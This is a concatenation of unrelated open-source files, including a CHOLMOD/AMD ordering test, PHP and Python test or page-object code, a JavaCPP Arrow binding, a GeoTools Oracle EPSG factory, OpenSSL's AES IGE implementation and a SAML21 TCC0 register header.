OK (CHOLMOD(print_perm) (P, n, n, "F: AMD permutation", cm)) ;
/* ------------------------------------------------------------------ */
/* order S with AMD_order */
/* ------------------------------------------------------------------ */
ok = AMD_order (n, Sp, Si, P, Control, Info) ;
printf ("amd return value: "ID"\n", ok) ;
AMD_info (Info) ;
OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
OK (CHOLMOD(print_perm) (P, n, n, "AMD permutation", cm)) ;
/* ------------------------------------------------------------------ */
/* order E with AMD_2, which destroys its contents */
/* ------------------------------------------------------------------ */
E = CHOLMOD(copy) (B, 0, -1, cm) ; /* remove diagonal entries */
bnz = CHOLMOD(nnz) (E, cm) ;
/* add the bare minimum extra space to E */
ok = CHOLMOD(reallocate_sparse) (bnz + n, E, cm) ;
OK (ok) ;
Ep = E->p ;
Ei = E->i ;
for (j = 0 ; j < n ; j++)
{
Len [j] = Ep [j+1] - Ep [j] ;
}
printf ("calling AMD_2:\n") ;
if (n > 0)
{
AMD_2 (n, Ep, Ei, Len, E->nzmax, Ep [n], Nv, Next, P, Head, Elen,
Deg, Wi, Control, Info) ;
AMD_info (Info) ;
OK (CHOLMOD(print_perm) (P, n, n, "AMD2 permutation", cm)) ;
}
/* ------------------------------------------------------------------ */
/* error tests */
/* ------------------------------------------------------------------ */
ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
ok = AMD_order (-1, Cp, Ci, P, Control, Info) ;
OK (ok == AMD_INVALID);
ok = AMD_order (0, Cp, Ci, P, Control, Info) ;
OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
ok = AMD_order (n, NULL, Ci, P, Control, Info) ;
OK (ok == AMD_INVALID);
ok = AMD_order (n, Cp, NULL, P, Control, Info) ;
OK (ok == AMD_INVALID);
ok = AMD_order (n, Cp, Ci, NULL, Control, Info) ;
OK (ok == AMD_INVALID);
if (n > 0)
{
printf ("AMD error tests:\n") ;
p = Cp [n] ;
Cp [n] = -1 ;
ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
OK (ok == AMD_INVALID) ;
if (Size_max/2 == Int_max)
{
Cp [n] = Int_max ;
ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
printf ("AMD status is "ID"\n", ok) ;
OK (ok == AMD_OUT_OF_MEMORY) ;
}
Cp [n] = p ;
ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
if (Cp [n] > 0)
{
printf ("Mangle column zero:\n") ;
i = Ci [0] ;
Ci [0] = -1 ;
ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
AMD_info (Info) ;
OK (ok == AMD_INVALID) ;
Ci [0] = i ;
}
}
ok = AMD_valid (n, n, Sp, Si) ;
OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
ok = AMD_valid (-1, n, Sp, Si) ; OK (ok == AMD_INVALID) ;
ok = AMD_valid (n, -1, Sp, Si) ; OK (ok == AMD_INVALID) ;
ok = AMD_valid (n, n, NULL, Si) ; OK (ok == AMD_INVALID) ;
ok = AMD_valid (n, n, Sp, NULL) ; OK (ok == AMD_INVALID) ;
if (n > 0 && Sp [n] > 0)
{
p = Sp [n] ;
Sp [n] = -1 ;
ok = AMD_valid (n, n, Sp, Si) ; OK (ok == AMD_INVALID) ;
Sp [n] = p ;
p = Sp [0] ;
Sp [0] = -1 ;
ok = AMD_valid (n, n, Sp, Si) ; OK (ok == AMD_INVALID) ;
Sp [0] = p ;
p = Sp [1] ;
Sp [1] = -1 ;
ok = AMD_valid (n, n, Sp, Si) ; OK (ok == AMD_INVALID) ;
Sp [1] = p ;
i = Si [0] ;
Si [0] = -1 ;
ok = AMD_valid (n, n, Sp, Si) ; OK (ok == AMD_INVALID) ;
Si [0] = i ;
}
ok = AMD_valid (n, n, Sp, Si) ;
OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
AMD_preprocess (n, Bp, Bi, Sp, Si, W, Flag) ;
ok = AMD_valid (n, n, Sp, Si) ;
OK (ok == AMD_OK) ;
if (n > 0 && Bp [n] > 0)
{
p = Bp [n] ;
Bp [n] = -1 ;
ok = AMD_valid (n, n, Bp, Bi) ; OK (ok == AMD_INVALID) ;
Bp [n] = p ;
p = Bp [1] ;
Bp [1] = -1 ;
ok = AMD_valid (n, n, Bp, Bi) ; OK (ok == AMD_INVALID) ;
Bp [1] = p ;
i = Bi [0] ;
Bi [0] = -1 ;
ok = AMD_valid (n, n, Bp, Bi) ; OK (ok == AMD_INVALID) ;
Bi [0] = i ;
}
AMD_preprocess (n, Bp, Bi, Sp, Si, W, Flag) ;
Info [AMD_STATUS] = 777 ;
AMD_info (Info) ;
/* ------------------------------------------------------------------ */
/* memory tests */
/* ------------------------------------------------------------------ */
if (n > 0)
{
normal_memory_handler ( ) ;
ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
test_memory_handler ( ) ;
for (trial = 0 ; trial < 6 ; trial++)
{
my_tries = trial ;
printf ("AMD memory trial "ID"\n", trial) ;
ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
AMD_info (Info) ;
OK (ok == AMD_OUT_OF_MEMORY
|| (sorted ? (ok == AMD_OK) : (ok >= AMD_OK))) ;
}
normal_memory_handler ( ) ;
OK (CHOLMOD(print_perm) (P, n, n, "AMD2 permutation", cm)) ;
}
CHOLMOD(free_sparse) (&E, cm) ;
}
/* ---------------------------------------------------------------------- */
/* free everything */
/* ---------------------------------------------------------------------- */
CHOLMOD(free) (n, sizeof (Int), Len, cm) ;
CHOLMOD(free) (n, sizeof (Int), Nv, cm) ;
CHOLMOD(free) (n, sizeof (Int), Next, cm) ;
CHOLMOD(free) (n+1, sizeof (Int), Head, cm) ;
CHOLMOD(free) (n, sizeof (Int), Elen, cm) ;
CHOLMOD(free) (n, sizeof (Int), Deg, cm) ;
CHOLMOD(free) (n, sizeof (Int), Wi, cm) ;
CHOLMOD(free) (n+1, sizeof (Int), P, cm) ;
CHOLMOD(free) (n, sizeof (Int), W, cm) ;
CHOLMOD(free) (n, sizeof (Int), Flag, cm) ;
CHOLMOD(free_sparse) (&S, cm) ;
CHOLMOD(free_sparse) (&B, cm) ;
CHOLMOD(free_sparse) (&C, cm) ;
CHOLMOD(free_sparse) (&F, cm) ;
}
| {
"pile_set_name": "Github"
} |
<?php
namespace SecTheater\Marketplace\Tests\Unit\Integration\Models;
use SecTheater\Marketplace\Models\EloquentCoupon as Coupon;
use SecTheater\Marketplace\Models\EloquentUser as User;
use SecTheater\Marketplace\Tests\TestCase;
class CouponTest extends TestCase {
public function setUp() {
parent::setUp();
$this->couponRepo = app('CouponRepository');
}
/** @test */
public function it_has_an_owner() {
$coupon = factory(Coupon::class)->create([
'user_id' => auth()->id(),
]);
$this->assertInstanceOf(User::class, $coupon->owner);
}
/** @test */
public function it_has_many_users_purchased_to() {
$coupon = factory(Coupon::class)->create([
'user_id' => auth()->id(),
]);
$coupon->users()->saveMany(
factory(User::class, 3)->create()
);
$this->assertCount(3, $coupon->users);
}
}
| {
"pile_set_name": "Github"
} |
from JDI.web.os_action.r_file_input import RFileInput
from JDI.web.selenium.elements.api_interact.find_element_by import By
from JDI.web.selenium.elements.common.link import Link
from JDI.web.selenium.elements.composite.web_page import WebPage
from Test.jdi_uitests_webtests.main.page_objects.sections.contact_form import ContactForm
class DatesPage(WebPage):
def __init__(self, url, title):
super(DatesPage, self).__init__(url=url, title=title)
r_image_input = RFileInput(By.css("[data-provides=fileinput]"))
uploaded_file_name = Link(By.css("[class=filename] span"))
contact_form = ContactForm(By.css("main form")) | {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: f9739c5b807e4753b15e3373f1fbb12e
timeCreated: 1568184201 | {
"pile_set_name": "Github"
} |
/**
* Turns Object with names of modules into Array of names of modules
*
* @param {Object} modules
* @returns {string[]}
*/
export default modules => Object.keys(modules).filter(module => modules[module]);
| {
"pile_set_name": "Github"
} |
--TEST--
"for" tags can be nested
--TEMPLATE--
{% for key, item in items %}
* {{ key }} ({{ loop.length }}):
{% for value in item %}
* {{ value }} ({{ loop.length }})
{% endfor %}
{% endfor %}
--DATA--
return ['items' => ['a' => ['a1', 'a2', 'a3'], 'b' => ['b1']]]
--EXPECT--
* a (2):
* a1 (3)
* a2 (3)
* a3 (3)
* b (2):
* b1 (1)
| {
"pile_set_name": "Github"
} |
// Targeted by JavaCPP version 1.5.4: DO NOT EDIT THIS FILE
package org.bytedeco.arrow;
import java.nio.*;
import org.bytedeco.javacpp.*;
import org.bytedeco.javacpp.annotation.*;
import static org.bytedeco.javacpp.presets.javacpp.*;
import static org.bytedeco.arrow.global.arrow.*;
@Name("std::vector<std::shared_ptr<arrow::Buffer> >") @Properties(inherit = org.bytedeco.arrow.presets.arrow.class)
public class BufferVector extends Pointer {
static { Loader.load(); }
/** Pointer cast constructor. Invokes {@link Pointer#Pointer(Pointer)}. */
public BufferVector(Pointer p) { super(p); }
public BufferVector(ArrowBuffer value) { this(1); put(0, value); }
public BufferVector(ArrowBuffer ... array) { this(array.length); put(array); }
public BufferVector() { allocate(); }
public BufferVector(long n) { allocate(n); }
private native void allocate();
private native void allocate(@Cast("size_t") long n);
public native @Name("operator =") @ByRef BufferVector put(@ByRef BufferVector x);
public boolean empty() { return size() == 0; }
public native long size();
public void clear() { resize(0); }
public native void resize(@Cast("size_t") long n);
@Index(function = "at") public native @SharedPtr ArrowBuffer get(@Cast("size_t") long i);
public native BufferVector put(@Cast("size_t") long i, ArrowBuffer value);
public native @ByVal Iterator insert(@ByVal Iterator pos, @SharedPtr ArrowBuffer value);
public native @ByVal Iterator erase(@ByVal Iterator pos);
public native @ByVal Iterator begin();
public native @ByVal Iterator end();
@NoOffset @Name("iterator") public static class Iterator extends Pointer {
public Iterator(Pointer p) { super(p); }
public Iterator() { }
public native @Name("operator ++") @ByRef Iterator increment();
public native @Name("operator ==") boolean equals(@ByRef Iterator it);
public native @Name("operator *") @SharedPtr ArrowBuffer get();
}
public ArrowBuffer[] get() {
ArrowBuffer[] array = new ArrowBuffer[size() < Integer.MAX_VALUE ? (int)size() : Integer.MAX_VALUE];
for (int i = 0; i < array.length; i++) {
array[i] = get(i);
}
return array;
}
@Override public String toString() {
return java.util.Arrays.toString(get());
}
public ArrowBuffer pop_back() {
long size = size();
ArrowBuffer value = get(size - 1);
resize(size - 1);
return value;
}
public BufferVector push_back(ArrowBuffer value) {
long size = size();
resize(size + 1);
return put(size, value);
}
public BufferVector put(ArrowBuffer value) {
if (size() != 1) { resize(1); }
return put(0, value);
}
public BufferVector put(ArrowBuffer ... array) {
if (size() != array.length) { resize(array.length); }
for (int i = 0; i < array.length; i++) {
put(i, array[i]);
}
return this;
}
}
| {
"pile_set_name": "Github"
} |
// TODO: Change value to $include-default-uis !default;
$include-panel-uis: true;
// ===============================
// ========= BASE PANEL ==========
// ===============================
$panel-border-radius: null !default;
$panel-border-width: 1px !default;
$panel-base-color: adjust-color($base-color, $hue: 0deg, $saturation: 0.542%, $lightness: 7.843%) !default; //#DFE8F6
$panel-border-color: adjust-color($base-color, $hue: 0deg, $saturation: 7.644%, $lightness: -8.627%) !default;
// ===============================
// ========= PANEL BODY ==========
// ===============================
$panel-body-border-style: solid !default;
$panel-body-background-color: #fff !default;
$panel-body-color: #000 !default;
$panel-body-border-color: $panel-border-color !default;
$panel-body-font-size: 12px !default;
// ===============================
// ======== PANEL TOOLS ==========
// ===============================
$tool-size: 15px !default;
// ===============================
// ======== PANEL HEADER =========
// ===============================
$panel-header-border-width: 1px !default;
$panel-header-border-style: solid !default;
$panel-header-inner-border: true !default;
$panel-header-inner-border-width: 1px 0 0 !default;
//padding
$panel-header-padding: 5px 4px 4px 5px !default;
//fonts
$panel-header-font-size: ceil($font-size * .9) !default; //11px
$panel-header-line-height: $tool-size !default;
$panel-header-font-weight: bold !default;
$panel-header-font-family: $font-family !default;
//background
$panel-header-background-gradient: 'panel-header' !default;
// UI defaults
$panel-header-border-color: $panel-border-color !default;
$panel-header-inner-border-color: adjust-color($panel-base-color, $hue: 0deg, $saturation: -6.098%, $lightness: 4.902%) !default;
$panel-header-color: adjust-color($panel-base-color, $hue: 0deg, $saturation: 38.347%, $lightness: -63.725%) !default;
$panel-header-background-color: adjust-color($panel-base-color, $hue: 0deg, $saturation: 6.402%, $lightness: -4.51%) !default;
// ===============================
// ======== FRAMED PANEL =========
// ===============================
$frame-base-color: $panel-base-color !default;
//border
$panel-frame-border-radius: 4px !default;
$panel-frame-border-width: 1px !default;
$panel-frame-border-style: solid !default;
$panel-frame-padding: 4px !default;
// UI defaults
$panel-frame-background-color: $frame-base-color !default;
$panel-frame-border-color: $panel-border-color !default;
| {
"pile_set_name": "Github"
} |
/* Copyright (c) 2008 Google Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.gdata.data.calendar;
import com.google.gdata.data.ExtensionDescription;
import com.google.gdata.data.ValueConstruct;
/**
* GData schema extension describing override name property of a calendar
*
*
*/
public class OverrideNameProperty extends ValueConstruct {
public static ExtensionDescription getDefaultDescription() {
return new ExtensionDescription(OverrideNameProperty.class,
Namespaces.gCalNs, "overridename");
}
public OverrideNameProperty() {
this(null);
}
public OverrideNameProperty(String value) {
super(Namespaces.gCalNs, "overridename", "value", value);
}
}
| {
"pile_set_name": "Github"
} |
/*
* GeoTools - The Open Source Java GIS Toolkit
* http://geotools.org
*
* (C) 2004-2008, Open Source Geospatial Foundation (OSGeo)
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation;
* version 2.1 of the License.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*/
package org.geotools.referencing.factory.epsg.oracle;
import java.sql.Connection;
import java.util.Iterator;
import java.util.Map;
import java.util.regex.Pattern;
import javax.sql.DataSource;
import org.geotools.referencing.factory.epsg.AnsiDialectEpsgFactory;
import org.geotools.util.factory.Hints;
/**
* An EPSG factory suitable for Oracle SQL syntax.
*
* @since 2.4
* @version $Id$
* @author John Grange
* @todo Since this class is constructed through the service provider API rather than directly
* instantiated by the user, we need some way to pass the schema information to this class. one
* possible approach is to set the schema in preferences. Maybe a better was is to look for a
* place in the Oracle {@link javax.sql.DataSource} for that.
*/
public class OracleDialectEpsgFactory extends AnsiDialectEpsgFactory {
/** The pattern to use for removing <code>" as "</code> elements from the SQL statements. */
private final Pattern pattern = Pattern.compile("\\sAS\\s");
/**
* Constructs an authority factory using the specified connection.
*
* @param userHints The underlying factories used for objects creation.
* @param connection The connection to the underlying EPSG database.
*/
public OracleDialectEpsgFactory(final Hints userHints, final Connection connection) {
super(userHints, connection);
}
/**
* Constructs an authority factory using the specified datasource.
*
* @param userHints The underlying factories used for objects creation.
* @param datasource The datasource of the underlying EPSG database.
*/
public OracleDialectEpsgFactory(final Hints userHints, final DataSource datasource) {
super(userHints, datasource);
}
/**
* Constructs an authority factory using the specified connection to an EPSG database and a
* database schema. If the database schema is not supplied, or it is null or an empty string,
* then the tables are assumed to be in the same schema as the user which is being used to
* connect to the database. You <strong>MUST</strong> ensure that the connecting user has
* permissions to select from all the tables in the epsg user schema.
*
* @param userHints The underlying factories used for objects creation.
* @param connection The connection to the underlying EPSG database.
* @param epsgSchema The database schema in which the epsg tables are stored (optional).
*/
public OracleDialectEpsgFactory(
final Hints userHints, final Connection connection, final String epsgSchema) {
super(userHints, connection);
adaptTableNames(epsgSchema);
}
/**
* Modifies the given SQL string to be suitable for an Oracle databases. This removes {@code "
* AS "} elements from the SQL statements as these don't work in oracle.
*
* @param statement The statement in MS-Access syntax.
* @return The SQL statement to use, suitable for an Oracle database.
*/
protected String adaptSQL(final String statement) {
return pattern.matcher(super.adaptSQL(statement)).replaceAll(" ");
}
/**
* If we have been supplied with a non null {@code epsgSchema}, prepend the schema to all the
* table names.
*
* @param epsgSchema The database schema in which the epsg tables are stored (optional).
*/
private void adaptTableNames(String epsgSchema) {
if (epsgSchema != null) {
epsgSchema = epsgSchema.trim();
if (epsgSchema.length() != 0) {
for (final Iterator it = map.entrySet().iterator(); it.hasNext(); ) {
final Map.Entry entry = (Map.Entry) it.next();
final String tableName = (String) entry.getValue();
/**
* Update the map, prepending the schema name to the table name so long as the
* value is a table name and not a field. This algorithm assumes that all old
* table names start with "epsg_".
*/
if (tableName.startsWith("epsg_")) {
entry.setValue(epsgSchema + '.' + tableName);
}
}
}
}
}
}
| {
"pile_set_name": "Github"
} |
require 'rexml/document'
module Saxerator
module Builder
class XmlBuilder
attr_reader :name
def initialize(config, name, attributes)
@config = config
@name = name
@attributes = attributes
@children = []
@text = false
end
def add_node(node)
@text = true if node.is_a? String
@children << node
end
def to_xml(builder)
element = REXML::Element.new(name, nil, attribute_quote: :quote)
element.add_attributes(@attributes)
if @text
element.add_text(@children.join)
else
@children.each { |child| child.to_xml(element) }
end
builder.elements << element
end
def block_variable
builder = REXML::Document.new
builder << REXML::XMLDecl.new('1.0', 'UTF-8')
to_xml(builder)
builder
end
end
end
end
| {
"pile_set_name": "Github"
} |
<?php
/**
* Author: XiaoFei Zhai
* Date: 2018/1/30
* Time: 9:49
*/
namespace App\Admin\Extensions;
use Encore\Admin\Form\Field;
class AetherUpload extends Field
{
protected $view = 'admin.aetherupload';
protected static $css = [
];
protected static $js = [
'/js/spark-md5.min.js',
'js/aetherupload.js'
];
public function render()
{
return parent::render();
}
} | {
"pile_set_name": "Github"
} |
/*
* Copyright 2006-2016 The OpenSSL Project Authors. All Rights Reserved.
*
* Licensed under the OpenSSL license (the "License"). You may not use
* this file except in compliance with the License. You can obtain a copy
* in the file LICENSE in the source distribution or at
* https://www.openssl.org/source/license.html
*/
#include "internal/cryptlib.h"
#include <openssl/aes.h>
#include "aes_locl.h"
#define N_WORDS (AES_BLOCK_SIZE / sizeof(unsigned long))
typedef struct {
unsigned long data[N_WORDS];
} aes_block_t;
/* XXX: probably some better way to do this */
#if defined(__i386__) || defined(__x86_64__)
# define UNALIGNED_MEMOPS_ARE_FAST 1
#else
# define UNALIGNED_MEMOPS_ARE_FAST 0
#endif
#if UNALIGNED_MEMOPS_ARE_FAST
# define load_block(d, s) (d) = *(const aes_block_t *)(s)
# define store_block(d, s) *(aes_block_t *)(d) = (s)
#else
# define load_block(d, s) memcpy((d).data, (s), AES_BLOCK_SIZE)
# define store_block(d, s) memcpy((d), (s).data, AES_BLOCK_SIZE)
#endif
/* N.B. The IV for this mode is _twice_ the block size */
void AES_ige_encrypt(const unsigned char *in, unsigned char *out,
size_t length, const AES_KEY *key,
unsigned char *ivec, const int enc)
{
size_t n;
size_t len = length;
if (length == 0)
return;
OPENSSL_assert(in && out && key && ivec);
OPENSSL_assert((AES_ENCRYPT == enc) || (AES_DECRYPT == enc));
OPENSSL_assert((length % AES_BLOCK_SIZE) == 0);
len = length / AES_BLOCK_SIZE;
if (AES_ENCRYPT == enc) {
if (in != out &&
(UNALIGNED_MEMOPS_ARE_FAST
|| ((size_t)in | (size_t)out | (size_t)ivec) % sizeof(long) ==
0)) {
aes_block_t *ivp = (aes_block_t *) ivec;
aes_block_t *iv2p = (aes_block_t *) (ivec + AES_BLOCK_SIZE);
while (len) {
aes_block_t *inp = (aes_block_t *) in;
aes_block_t *outp = (aes_block_t *) out;
for (n = 0; n < N_WORDS; ++n)
outp->data[n] = inp->data[n] ^ ivp->data[n];
AES_encrypt((unsigned char *)outp->data,
(unsigned char *)outp->data, key);
for (n = 0; n < N_WORDS; ++n)
outp->data[n] ^= iv2p->data[n];
ivp = outp;
iv2p = inp;
--len;
in += AES_BLOCK_SIZE;
out += AES_BLOCK_SIZE;
}
memcpy(ivec, ivp->data, AES_BLOCK_SIZE);
memcpy(ivec + AES_BLOCK_SIZE, iv2p->data, AES_BLOCK_SIZE);
} else {
aes_block_t tmp, tmp2;
aes_block_t iv;
aes_block_t iv2;
load_block(iv, ivec);
load_block(iv2, ivec + AES_BLOCK_SIZE);
while (len) {
load_block(tmp, in);
for (n = 0; n < N_WORDS; ++n)
tmp2.data[n] = tmp.data[n] ^ iv.data[n];
AES_encrypt((unsigned char *)tmp2.data,
(unsigned char *)tmp2.data, key);
for (n = 0; n < N_WORDS; ++n)
tmp2.data[n] ^= iv2.data[n];
store_block(out, tmp2);
iv = tmp2;
iv2 = tmp;
--len;
in += AES_BLOCK_SIZE;
out += AES_BLOCK_SIZE;
}
memcpy(ivec, iv.data, AES_BLOCK_SIZE);
memcpy(ivec + AES_BLOCK_SIZE, iv2.data, AES_BLOCK_SIZE);
}
} else {
if (in != out &&
(UNALIGNED_MEMOPS_ARE_FAST
|| ((size_t)in | (size_t)out | (size_t)ivec) % sizeof(long) ==
0)) {
aes_block_t *ivp = (aes_block_t *) ivec;
aes_block_t *iv2p = (aes_block_t *) (ivec + AES_BLOCK_SIZE);
while (len) {
aes_block_t tmp;
aes_block_t *inp = (aes_block_t *) in;
aes_block_t *outp = (aes_block_t *) out;
for (n = 0; n < N_WORDS; ++n)
tmp.data[n] = inp->data[n] ^ iv2p->data[n];
AES_decrypt((unsigned char *)tmp.data,
(unsigned char *)outp->data, key);
for (n = 0; n < N_WORDS; ++n)
outp->data[n] ^= ivp->data[n];
ivp = inp;
iv2p = outp;
--len;
in += AES_BLOCK_SIZE;
out += AES_BLOCK_SIZE;
}
memcpy(ivec, ivp->data, AES_BLOCK_SIZE);
memcpy(ivec + AES_BLOCK_SIZE, iv2p->data, AES_BLOCK_SIZE);
} else {
aes_block_t tmp, tmp2;
aes_block_t iv;
aes_block_t iv2;
load_block(iv, ivec);
load_block(iv2, ivec + AES_BLOCK_SIZE);
while (len) {
load_block(tmp, in);
tmp2 = tmp;
for (n = 0; n < N_WORDS; ++n)
tmp.data[n] ^= iv2.data[n];
AES_decrypt((unsigned char *)tmp.data,
(unsigned char *)tmp.data, key);
for (n = 0; n < N_WORDS; ++n)
tmp.data[n] ^= iv.data[n];
store_block(out, tmp);
iv = tmp2;
iv2 = tmp;
--len;
in += AES_BLOCK_SIZE;
out += AES_BLOCK_SIZE;
}
memcpy(ivec, iv.data, AES_BLOCK_SIZE);
memcpy(ivec + AES_BLOCK_SIZE, iv2.data, AES_BLOCK_SIZE);
}
}
}
/*
* Note that its effectively impossible to do biIGE in anything other
* than a single pass, so no provision is made for chaining.
*/
/* N.B. The IV for this mode is _four times_ the block size */
void AES_bi_ige_encrypt(const unsigned char *in, unsigned char *out,
size_t length, const AES_KEY *key,
const AES_KEY *key2, const unsigned char *ivec,
const int enc)
{
size_t n;
size_t len = length;
unsigned char tmp[AES_BLOCK_SIZE];
unsigned char tmp2[AES_BLOCK_SIZE];
unsigned char tmp3[AES_BLOCK_SIZE];
unsigned char prev[AES_BLOCK_SIZE];
const unsigned char *iv;
const unsigned char *iv2;
OPENSSL_assert(in && out && key && ivec);
OPENSSL_assert((AES_ENCRYPT == enc) || (AES_DECRYPT == enc));
OPENSSL_assert((length % AES_BLOCK_SIZE) == 0);
if (AES_ENCRYPT == enc) {
/*
* XXX: Do a separate case for when in != out (strictly should check
* for overlap, too)
*/
/* First the forward pass */
iv = ivec;
iv2 = ivec + AES_BLOCK_SIZE;
while (len >= AES_BLOCK_SIZE) {
for (n = 0; n < AES_BLOCK_SIZE; ++n)
out[n] = in[n] ^ iv[n];
AES_encrypt(out, out, key);
for (n = 0; n < AES_BLOCK_SIZE; ++n)
out[n] ^= iv2[n];
iv = out;
memcpy(prev, in, AES_BLOCK_SIZE);
iv2 = prev;
len -= AES_BLOCK_SIZE;
in += AES_BLOCK_SIZE;
out += AES_BLOCK_SIZE;
}
/* And now backwards */
iv = ivec + AES_BLOCK_SIZE * 2;
iv2 = ivec + AES_BLOCK_SIZE * 3;
len = length;
while (len >= AES_BLOCK_SIZE) {
out -= AES_BLOCK_SIZE;
/*
* XXX: reduce copies by alternating between buffers
*/
memcpy(tmp, out, AES_BLOCK_SIZE);
for (n = 0; n < AES_BLOCK_SIZE; ++n)
out[n] ^= iv[n];
/*
* hexdump(stdout, "out ^ iv", out, AES_BLOCK_SIZE);
*/
AES_encrypt(out, out, key);
/*
* hexdump(stdout,"enc", out, AES_BLOCK_SIZE);
*/
/*
* hexdump(stdout,"iv2", iv2, AES_BLOCK_SIZE);
*/
for (n = 0; n < AES_BLOCK_SIZE; ++n)
out[n] ^= iv2[n];
/*
* hexdump(stdout,"out", out, AES_BLOCK_SIZE);
*/
iv = out;
memcpy(prev, tmp, AES_BLOCK_SIZE);
iv2 = prev;
len -= AES_BLOCK_SIZE;
}
} else {
/* First backwards */
iv = ivec + AES_BLOCK_SIZE * 2;
iv2 = ivec + AES_BLOCK_SIZE * 3;
in += length;
out += length;
while (len >= AES_BLOCK_SIZE) {
in -= AES_BLOCK_SIZE;
out -= AES_BLOCK_SIZE;
memcpy(tmp, in, AES_BLOCK_SIZE);
memcpy(tmp2, in, AES_BLOCK_SIZE);
for (n = 0; n < AES_BLOCK_SIZE; ++n)
tmp[n] ^= iv2[n];
AES_decrypt(tmp, out, key);
for (n = 0; n < AES_BLOCK_SIZE; ++n)
out[n] ^= iv[n];
memcpy(tmp3, tmp2, AES_BLOCK_SIZE);
iv = tmp3;
iv2 = out;
len -= AES_BLOCK_SIZE;
}
/* And now forwards */
iv = ivec;
iv2 = ivec + AES_BLOCK_SIZE;
len = length;
while (len >= AES_BLOCK_SIZE) {
memcpy(tmp, out, AES_BLOCK_SIZE);
memcpy(tmp2, out, AES_BLOCK_SIZE);
for (n = 0; n < AES_BLOCK_SIZE; ++n)
tmp[n] ^= iv2[n];
AES_decrypt(tmp, out, key);
for (n = 0; n < AES_BLOCK_SIZE; ++n)
out[n] ^= iv[n];
memcpy(tmp3, tmp2, AES_BLOCK_SIZE);
iv = tmp3;
iv2 = out;
len -= AES_BLOCK_SIZE;
in += AES_BLOCK_SIZE;
out += AES_BLOCK_SIZE;
}
}
}
| {
"pile_set_name": "Github"
} |
libbar/blah.go:3:8: cannot find package "xxx" in any of:
D:\devel\tools.Go\go1.3.2.windows-386\go\src\pkg\fmt222 (from $GOROOT)
D:\devel\tools.Go\go-workspace\src\fmt222 (from $GOPATH)
../MyGoLibFoo/libfoo/blah.go:3:8: cannot find package "yyy" in any of:
D:\devel\tools.Go\go1.3.2.windows-386\go\src\pkg\fmt22 (from $GOROOT)
D:\devel\tools.Go\go-workspace\src\fmt22 (from $GOPATH)
$$TESTRESOURCE_SAMPLE_GOPATH_ENTRY$$/src/samplePackage/foo.go:3:2: cannot find package "zzz" in any of:
D:\devel\tools.Go\go1.3.2.windows-386\go\src\pkg\fmt22 (from $GOROOT)
D:\devel\tools.Go\go-workspace\src\fmt22 (from $GOPATH) | {
"pile_set_name": "Github"
} |
/**
* \file
*
* \brief Instance description for TCC0
*
* Copyright (c) 2018 Microchip Technology Inc.
*
* \asf_license_start
*
* \page License
*
* SPDX-License-Identifier: Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the Licence at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an AS IS BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* \asf_license_stop
*
*/
#ifndef _SAML21_TCC0_INSTANCE_
#define _SAML21_TCC0_INSTANCE_
/* ========== Register definition for TCC0 peripheral ========== */
#if (defined(__ASSEMBLY__) || defined(__IAR_SYSTEMS_ASM__))
#define REG_TCC0_CTRLA (0x42001400) /**< \brief (TCC0) Control A */
#define REG_TCC0_CTRLBCLR (0x42001404) /**< \brief (TCC0) Control B Clear */
#define REG_TCC0_CTRLBSET (0x42001405) /**< \brief (TCC0) Control B Set */
#define REG_TCC0_SYNCBUSY (0x42001408) /**< \brief (TCC0) Synchronization Busy */
#define REG_TCC0_FCTRLA (0x4200140C) /**< \brief (TCC0) Recoverable Fault A Configuration */
#define REG_TCC0_FCTRLB (0x42001410) /**< \brief (TCC0) Recoverable Fault B Configuration */
#define REG_TCC0_WEXCTRL (0x42001414) /**< \brief (TCC0) Waveform Extension Configuration */
#define REG_TCC0_DRVCTRL (0x42001418) /**< \brief (TCC0) Driver Control */
#define REG_TCC0_DBGCTRL (0x4200141E) /**< \brief (TCC0) Debug Control */
#define REG_TCC0_EVCTRL (0x42001420) /**< \brief (TCC0) Event Control */
#define REG_TCC0_INTENCLR (0x42001424) /**< \brief (TCC0) Interrupt Enable Clear */
#define REG_TCC0_INTENSET (0x42001428) /**< \brief (TCC0) Interrupt Enable Set */
#define REG_TCC0_INTFLAG (0x4200142C) /**< \brief (TCC0) Interrupt Flag Status and Clear */
#define REG_TCC0_STATUS (0x42001430) /**< \brief (TCC0) Status */
#define REG_TCC0_COUNT (0x42001434) /**< \brief (TCC0) Count */
#define REG_TCC0_PATT (0x42001438) /**< \brief (TCC0) Pattern */
#define REG_TCC0_WAVE (0x4200143C) /**< \brief (TCC0) Waveform Control */
#define REG_TCC0_PER (0x42001440) /**< \brief (TCC0) Period */
